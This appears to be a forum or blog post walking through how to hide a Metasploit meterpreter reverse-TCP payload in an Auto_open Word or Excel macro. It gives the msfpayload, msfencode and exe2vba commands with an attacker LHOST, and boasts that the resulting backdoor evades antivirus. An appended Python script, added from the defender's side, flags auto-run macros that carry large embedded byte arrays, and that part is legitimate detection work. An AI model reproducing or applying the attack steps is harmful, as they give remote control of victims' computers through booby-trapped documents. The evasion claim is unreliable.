This is how I embedded it.
root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@LM:/opt/metasploit3/msf#
root@LM:/opt/metasploit3/msf3# mv payload.exe tools/
root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 73802 bytes of EXE into a VBA script
#payload.vbs
Now open MS Word/Excel and perform the following steps.
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor. If you’re using Word/Excel 2007, go to View Macros, then enter a name like “lancit” and select “Create”.
This will pop up the Visual Basic editor. Paste the output of payload.vbs into it and save it. Put any words you want in the actual Word doc itself. The purpose is a client-side attack.
The output looks like this:
Sub Auto_open()
.
.
.
.
.
.
End Sub
Then you will get a nice backdoor that is undetectable by antivirus.
Happy Trying...
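From the defender's side, the two traits visible in this post (a procedure named Auto_open that Office runs on its own, and a macro carrying tens of thousands of embedded bytes) can be triaged from the macro source. The Python sketch below is an added example, not part of the original post or of Metasploit; it assumes the VBA source has already been extracted as text (for example with olevba), and the function names, the threshold of 1000 and the sample macros are constructed for illustration.

```python
import re

# Procedure names Word/Excel run automatically when a document opens or closes.
AUTO_EXEC = re.compile(
    r"^[ \t]*(?:(?:Public|Private)[ \t]+)?Sub[ \t]+"
    r"(Auto_?Open|Auto_?Close|AutoExec|Document_Open|Workbook_Open)[ \t]*\(",
    re.IGNORECASE | re.MULTILINE)
# Stand-alone decimal literals of up to three digits (candidate byte values).
NUMBER = re.compile(r"(?<![\w.])\d{1,3}(?![\w.])")
BYTE_LITERAL_THRESHOLD = 1000  # assumed cut-off, tune for your environment

def strip_comments(source):
    """Drop VBA comments (' ... and Rem ...) so commented-out code is ignored."""
    out = []
    for line in source.splitlines():
        if re.match(r"\s*Rem\b", line, re.IGNORECASE):
            continue
        in_string, kept = False, []
        for ch in line:
            if ch == '"':
                in_string = not in_string      # quotes toggle string state
            elif ch == "'" and not in_string:
                break                          # rest of the line is a comment
            kept.append(ch)
        out.append("".join(kept))
    return "\n".join(out)

def triage_macro(source, threshold=BYTE_LITERAL_THRESHOLD):
    """Report auto-run entry points and the amount of byte-like embedded data."""
    code = strip_comments(source)
    entry_points = sorted({m.group(1).lower() for m in AUTO_EXEC.finditer(code)})
    byte_literals = sum(1 for n in NUMBER.findall(code) if int(n) <= 255)
    if entry_points and byte_literals >= threshold:
        verdict = "suspicious"   # auto-run plus a large embedded blob
    elif entry_points:
        verdict = "review"       # auto-run alone is common in benign workbooks
    else:
        verdict = "none"
    return {"entry_points": entry_points, "byte_literals": byte_literals,
            "verdict": verdict}

# Constructed samples (inert, not the exe2vba output from the post).
BLOB = ", ".join(str(i % 256) for i in range(2000))
SAMPLE_EMBEDDED = "Sub Auto_Open()\n    data = Array(" + BLOB + ")\nEnd Sub\n"
SAMPLE_BENIGN = 'Sub Workbook_Open()\n    Range("A1").Value = Now\nEnd Sub\n'
SAMPLE_COMMENTED = "' Sub Auto_Open()\nSub Report()\n    x = 1\nEnd Sub\n"

if __name__ == "__main__":
    for src in (SAMPLE_EMBEDDED, SAMPLE_BENIGN, SAMPLE_COMMENTED):
        print(triage_macro(src))
```

A "review" result only means the macro runs without user action; the embedded-data count is what separates a converted executable from an ordinary start-up macro.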